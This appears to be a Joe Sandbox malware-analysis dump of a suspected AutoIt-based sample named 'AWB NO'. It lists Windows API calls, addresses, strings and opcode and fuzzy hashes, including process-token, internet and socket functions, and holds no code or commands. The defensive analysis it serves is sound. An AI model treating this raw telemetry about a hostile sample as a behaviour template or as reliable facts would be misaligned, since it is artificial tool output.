                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0045882E), ref: 00458C7E
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                              • Instruction ID: 148d01963af32c2189f656cf55398bdaca1906d37348cb6d923cd77144567ac4
                                                              • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                              • Instruction Fuzzy Hash: 12E04F366422119BE7205FB46D0CB5B3BA8AF55792F144C3CA645D9041DA3884498B65
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00442187
                                                              • GetDC.USER32(00000000), ref: 00442191
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004421B1
                                                              • ReleaseDC.USER32(?), ref: 004421D2
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 5bbe9da29bb028000d041de13fcf9ef3459c43b5ca73f2136cb50eb93e1f9c3e
                                                              • Instruction ID: e80bcdaed25015b38fc075b9af120d0661f73bd954452babf2cca2976e4e6e99
                                                              • Opcode Fuzzy Hash: 5bbe9da29bb028000d041de13fcf9ef3459c43b5ca73f2136cb50eb93e1f9c3e
                                                              • Instruction Fuzzy Hash: 8BE01A75900204EFDB019FA0C808A9D7BF1EF5C350F108A3AF95AE7260DB7885569F49
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 0044219B
                                                              • GetDC.USER32(00000000), ref: 004421A5
                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004421B1
                                                              • ReleaseDC.USER32(?), ref: 004421D2
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 759070b2aa7e70da72d0065fe67b3aad0a5dd84fe2bb9f944ae5bc76f43ec042
                                                              • Instruction ID: 0585887194f83d5896a0f01572a955ee9a0ca529f388d05c95cdd3c21f880870
                                                              • Opcode Fuzzy Hash: 759070b2aa7e70da72d0065fe67b3aad0a5dd84fe2bb9f944ae5bc76f43ec042
                                                              • Instruction Fuzzy Hash: 98E01A75900204EFCB019FB0C80869D7BF1EF5C310F108939F95AA7260DB3895569F48
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X
                                                              • API String ID: 0-3081909835
                                                              • Opcode ID: 78dcd989974ff6f98f82db94458459d0756c027123f6ceb7d83543aa6ff017c1
                                                              • Instruction ID: e5faa3e43e2d4f2b39f1221ea160a1343461ec5a37f38ef29422b0ed6a717957
                                                              • Opcode Fuzzy Hash: 78dcd989974ff6f98f82db94458459d0756c027123f6ceb7d83543aa6ff017c1
                                                              • Instruction Fuzzy Hash: 8FC161756083009FC714EF25D885A5BB7E4EF85314F00492EF899972A2EB38ED45CB9B
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 00412AC8
                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412AE1
                                                              Strings
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: b558b19cd7410ff0673be4cd2c30f66381e90844ad9ecc940d55a87096154234
                                                              • Instruction ID: 198fa7249bf4a10115936ac5cec7f523fb376c2af7af020f0510a7a60b6fc721
                                                              • Opcode Fuzzy Hash: b558b19cd7410ff0673be4cd2c30f66381e90844ad9ecc940d55a87096154234
                                                              • Instruction Fuzzy Hash: 28517A715187449BD320AF15DC85BAFBBE8FFC4314F42486DF2D9510A2DB749828CB2A
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID: DtL$DtL
                                                              • API String ID: 1473721057-1281546423
                                                              • Opcode ID: ba00002b2a634e8d7a596488485226b2de833e29279846e854443180cd2b2818
                                                              • Instruction ID: da1fff8ce702562cff1de6885822424690271d2b2b1ac71984817684a9cead06
                                                              • Opcode Fuzzy Hash: ba00002b2a634e8d7a596488485226b2de833e29279846e854443180cd2b2818
                                                              • Instruction Fuzzy Hash: B7510578608341CFD754CF19C480A1ABBF1BB99344F54886EE9859B3A1D339EC91CF4A
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00486D86
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486DC2
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 9c170b6e62782a39325b379c71f121cdc45194cdd9bfa83a2855cc7d2f6a19fb
                                                              • Instruction ID: ac4952246417f6e5eabf139c329a91c40342bfa59b822e976b0221753ab176b8
                                                              • Opcode Fuzzy Hash: 9c170b6e62782a39325b379c71f121cdc45194cdd9bfa83a2855cc7d2f6a19fb
                                                              • Instruction Fuzzy Hash: 22319271200204AEDB10AF64DC40BFF73A8FF48714F11892EF89597190DA35AC51DB68
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004869D0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004869DB
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: bcfd4814bd11f60ceb698292fccd5a8b961f0c50819f1fee78ff055a4f109a5e
                                                              • Instruction ID: 6041aa2516f7a9dd56df650238f776de4a8a29a273b23500d66360a3029cdda3
                                                              • Opcode Fuzzy Hash: bcfd4814bd11f60ceb698292fccd5a8b961f0c50819f1fee78ff055a4f109a5e
                                                              • Instruction Fuzzy Hash: 4711B6B16002086FEF51AF14CC80EAF376EEB843A4F12452AF958973D0D6799C5187A4
                                                              APIs
                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                              • GetWindowRect.USER32(00000000,?), ref: 00486EE0
                                                              • GetSysColor.USER32(00000012), ref: 00486EFA
                                                              Strings
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: f2d810d17fd63640c0199e69d22ca8f20409b6ce86d908634d9821f1fc52f206
                                                              • Instruction ID: 29a9b64aecc222300d436bcd3a63065e5534f5b76e47b581503888c6130dc53c
                                                              • Opcode Fuzzy Hash: f2d810d17fd63640c0199e69d22ca8f20409b6ce86d908634d9821f1fc52f206
                                                              • Instruction Fuzzy Hash: 39215C72610209AFDB05EFA8DC45EFE7BB8FB08314F014A29FD55D3250D638E8619B54
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00486C11
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00486C20
                                                              Strings
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: 0ee778e15671e51e222ddf6b494b90a822ca39a2f7f3572f5c0e2ac18639bf76
                                                              • Instruction ID: b0ee5d61ad9eb474c31c7c598f165b0da72494184ac180eda5d14d3501cef6af
                                                              • Opcode Fuzzy Hash: 0ee778e15671e51e222ddf6b494b90a822ca39a2f7f3572f5c0e2ac18639bf76
                                                              • Instruction Fuzzy Hash: 3B119D71501118ABEB506E649C41AAF3769EF04378F614B2AF960D72E0C739EC919B68
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00472520
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472549
                                                              Strings
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: b4e2ad384fd7c601628b52258e18064e8563b109b01ba46a19230f2044734790
                                                              • Instruction ID: 671247dd43dff78d3ba65fd013137b1b80bf3ca9b363514825ab6a5c38d559c9
                                                              • Opcode Fuzzy Hash: b4e2ad384fd7c601628b52258e18064e8563b109b01ba46a19230f2044734790
                                                              • Instruction Fuzzy Hash: 0C110270500225BAEB248F618D98EFBFF68FF06355F10C12BF90952240D2B86955DAF9
                                                              APIs
                                                                • Part of subcall function 0047830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,004780C8,?,00000000,?,?), ref: 00478322
                                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 004780CB
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 00478108
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 2496851823-2422070025
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00459355
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassMessageNameSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3678867486-1403004172
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0045924D
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassMessageNameSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3678867486-1403004172
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 004592D0
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassMessageNameSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3678867486-1403004172
                                                              APIs
                                                                • Part of subcall function 00429E4B: EnterCriticalSection.KERNEL32(00000000,?,00429CBC,0000000D), ref: 00429E76
                                                              • DeleteCriticalSection.KERNEL32(sin,004BC010,00000010,00426E34), ref: 00433C0B
                                                              Strings
                                                              Similarity
                                                              • API ID: CriticalSection$DeleteEnter
                                                              • String ID: @RL$sin
                                                              • API String ID: 228587788-1659946082
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004581CA
                                                              Strings
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 2030045667-4017498283
                                                              APIs
                                                                • Part of subcall function 00420B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0043B540,?,?,?,0040100A), ref: 00420B89
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B544
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B553
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B54E
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 55579361-631824599
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: LocalTime
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 481472006-2409531811
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00485BF5
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00485C08
                                                                • Part of subcall function 004654E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0046555E
                                                              Strings
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00434948
                                                              • GetLastError.KERNEL32 ref: 00434956
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004349A9
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004349E4
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                              • String ID:
                                                              • API String ID: 1717984340-0